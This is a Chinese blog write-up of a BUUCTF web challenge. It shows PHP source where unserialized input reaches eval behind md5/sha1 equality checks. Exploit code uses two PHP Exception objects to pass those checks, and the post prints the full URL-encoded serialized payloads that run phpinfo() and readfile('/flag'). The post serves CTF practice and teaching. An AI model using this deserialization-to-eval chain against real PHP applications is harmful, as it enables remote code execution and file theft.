Exception类绕过md5、sha1等

最新推荐文章于 2024-03-15 14:23:54 发布
最新推荐文章于 2024-03-15 14:23:54 发布
阅读量1.4k 收藏 10
点赞数
分类专栏: # BUUCTF-Web 文章标签: ctf php反序列化 新星计划 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/114493052
版权

源码:

<?php
show_source(__FILE__);
class CDUTSEC
{
    public $var1;
    public $var2;

    function __construct($var1, $var2)
    {
        $var1 = $var1;
        $var2 = $var2;
    }

    function __destruct()
    {
        echo md5($this->var1);
        echo md5($this->var2);
        if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2))) {
            eval($this->var1);
        }
    }
}

unserialize($_GET['payload']);

Notice: Undefined index: payload in /var/www/html/index.php on line 24

代码审计:
这里与前一题相比,多了一个sha1绕过,但是fastcoll是不能满足sha1绕过的。
这里我们采用Exception类绕过md5、sha1等系列。
解题:

<?php
class CDUTSEC
{
    public $var1;
    public $var2;
} 

$cmd="phpinfo();?>";
$a = new Exception($cmd);
$b = new Exception($cmd,1);

$tr = new CDUTSEC();
$tr->var1=$a;
$tr->var2=$b;

echo urlencode(serialize($tr));

代码运行得到payload:O%3A7%3A%22CDUTSEC%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A12%3A%22phpinfo%28%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A41%3A%22D%3A%5Csublime%5CSublime+Text+3%5C%E4%BB%A3%E7%A0%81%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A9%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A12%3A%22phpinfo%28%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A41%3A%22D%3A%5Csublime%5CSublime+Text+3%5C%E4%BB%A3%E7%A0%81%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A9%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D%7D
测试payload:
在这里插入图片描述
说明思路是正确的,接着我们将phpinfo();?>换成readfile('/flag');?>

<?php
class CDUTSEC
{
    public $var1;
    public $var2;
} 

$cmd="readfile('/flag');?>";
$a = new Exception($cmd);$b = new Exception($cmd,1);

$tr = new CDUTSEC();
$tr->var1=$a;
$tr->var2=$b;
echo urlencode(serialize($tr));

运行代码得到payload:O%3A7%3A%22CDUTSEC%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A41%3A%22D%3A%5Csublime%5CSublime+Text+3%5C%E4%BB%A3%E7%A0%81%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A9%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A41%3A%22D%3A%5Csublime%5CSublime+Text+3%5C%E4%BB%A3%E7%A0%81%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A9%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D%7D
执行payload:
在这里插入图片描述

H3rmesk1t
关注
专栏目录
任务5_开发测试服务器
m0_45155797的博客
12-16 501
1.开发测试服务器首页存在漏洞,请利用漏洞找出 flag,并将 flag提交。flag格式:flag{} 2.开发测试服务器第二个页面存在的漏洞,请利用漏洞找出 flag,并将flag提交。flag格式:flag{} 3.开发测试服务器第三个页面存在的漏洞,请利用漏洞找出 flag,并将flag提交。flag格式:flag{}
Java代码高风险弱点与修复之——弱密码哈希漏洞-Very weak password hashing (WEAK_PASSWORD_HASH)
最新发布
oscar999的专栏
06-29 366
安全性方面,此代码的一个主要问题在于,它依赖于使用SHA-256哈希函数直接处理密码以产生密钥。弱密码哈希漏洞指的是在密码存储和验证过程中,由于使用了不安全的哈希算法或哈希函数的错误使用,导致攻击者能够更容易地破解或绕过密码验证机制。以上代码结合了安全的随机盐值、密钥衍生函数和迭代次数等多个安全机制,大大提升了密码到密钥转换过程的安全性。这意味着相同的密码将始终生成相同的密钥,降低了安全性。:若用户选择的密码复杂度不高,如普通单词或常见短语,即使经过SHA-256哈希,生成的密钥也容易遭受彩虹表攻击。
bugku学习之sha1绕过(前面过狗一句话是Md5绕过
s11show_163的博客
02-29 783
这个题要求get传递id的url解码之后值是margin,发现‘margin’进行url加密解密都是本身 并且要求get传递的uname和post传递的passwd值在进行sha1加密之后的值和型都相等但是加密前的值又不能相等,这要怎么办呢? sha1加密数组的时候会无法处理导致sha1($_GET['uname'])和sha1($_POST['passwd'])的返回值都为null这就绕过...
Java 异常处理的误区和经验总结
Evan_Treborn的专栏
10-20 629
本文着重介绍了 Java 异常选择和使用中的一些误区,希望各位读者能够熟练掌握异常处理的一些注意点和原则,注意总结和归纳。只有处理好了异常,才能提升开发人员的基本素养,提高系统的健壮性,提升用户体验,提高产品的价值。 误区一、异常的选择 图 1. 异常分 图 1 描述了异常的结构,其实我们都知道异常分检测异常和非检测异常,但是在实际中又混淆了这两种异常的应用。由于非检测异常
CTF的superezpop题目详解,以及对MD5和SH1绕过的学习
tutuwanc的博客
12-06 678
第一种:创建两个数组,并赋值给username和password,因为md5SHA1对数组识别会有漏洞。我们先来看思路,接收到x变量的是序列化的内容,反序列化之后,会调用。所以我们需要先调用get函数,在从get函数中调用invoke函数。该对比,我们可以看到MD5SHA1是强比较,具体内容可以参考。,我们需要从创建User的,来进入if循环内,并且通过。__get($key)函数和__invoke()函数。当我们绕过MD5之后考虑如果得到flag。第二种:用Error错误绕过
加密算法 Md5 & Sha1
weixin_30905981的博客
07-04 243
MD5加密 使用MD5CryptoServiceProvider 1 public static string Md5(string str) 2 { 3 var buffer = Encoding.UTF8.GetBytes(str); 4 5 MD5 md5 = new MD5CryptoServiceProvide...
跳过HTTPS调用时证书SLL问题
糖糖糖糖糖糖分
04-24 1838
今天在对接一个银商的项目接口,测试环境调用,在写调用util的时候,有一些证书相关问题。 对于http换成支持https调用,网上有很多的重写方法。就不细说了。 先把代码贴一下: (还有2个,我稍微改下晚点补上代码~) SSLClientUtil.java package com.naka.fizzbuzz; import java.net.Socket; import jav...
序列化和反序列化刷题记录
一只菜鸡
01-28 1652
BUU CODE REVIEW\ *反序列化 md5 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try {
详解比springSecurity和shiro更简单优雅的轻量级Sa-Token框架,比如登录认证,权限认证,单点登录,OAuth2.0,分布式Session会话,微服务网关鉴权
念兮为美
08-30 3972
详解比springSecurity和shiro更简单优雅的轻量级Sa-Token框架,比如登录认证,权限认证,单点登录,OAuth2.0,分布式Session会话,微服务网关鉴权。演示SpringBoot集成Sa-Token和Spring WebFlux集成Sa-Token这两个常用的开发框架。......
Find-Sec-Bugs 漏洞范例
zhaohonghan的博客
04-03 1万+
Find-Sec-Bugs 漏洞范例 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
型比较
m0_74317362的博客
07-24 180
型比较
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1817
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目型和利用姿势。 PHP的弱比较 进入正题之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
md5相关比较
m0_51428325的博客
11-16 1133
弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199...
CISCN2020-easytrick
qwsn
11-20 1737
0x01、Web 1.CISCN2020-easytrick 第一步:代码审计 <?php class trick{ //:trick public $trick1; //公有属性:$trick1 public $trick2; //公有属性:$trick2 public function __destruct(){ //公有析构方法:当所在的实例化对象销毁前,自动被调用 $this->trick1 = (string)$this->tr
CTFWeb-BUUCTF竞赛真题WriteUp(1)_ctf no0b
yy1715713348的博客
03-15 1971
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真题环境:此处记录下部分 Web 题目练习过程。
PHP原生反序列化(上)
m0_62422842的博客
06-01 1540
php代码只有一个或者没有利用时,我们就可以调用php的内置来进行目录遍历和任意文件读取等一系列的操作。内置,顾名思义就是php本身存在的,我们可以直接拿过来用。本次来学习经常能用到的几种内置。目录遍历的内置有三种。 查看官方文档可以发现FilesystemIterator与DirectoryIterator是继承关系的(附上官方文档PHP: SPL - Manual)在该下有一个_toString方法。这个会创建一个指定目录的迭代器,当遇上echo输出时就会自动调用_toStrin
PHP绕过MD5比较的各种姿势
b1ackc4t的博客
08-27 4163
1.用==进行弱型比较时, 可以通过两个0e开头后面纯数字的md5绕过 php在进行弱型比较时,如果为字符串为纯数字,包括浮点数、科学计数法、十六进制数等,都会转化为数字型再进行比较,利用这点,0e开头的科学计数法大小均为0,所有均相等,即可绕过 以下实例的md5均满足0e开头纯数字 byGcY sonZ7y 240610708 s878926199a s155964671a s214587387a s214587387a s878926199a QNKCDZO aabg7XS
CTF中常见的PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2566
1.弱型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
CTF中常见php-MD5()函数漏洞
热门推荐
等风来
10-11 2万+
CTF中常见php-MD5()函数漏洞 1.数字与字符串之间的比较 var_dump( 0 == "a" ); var_dump( "0" == "a" ); 第一个返回的是 true ,第二个返回的是 false 因为php把字母开头的转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前(如intval(’'123abd45gf)结果为123) 2.MD5函数漏洞 $...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值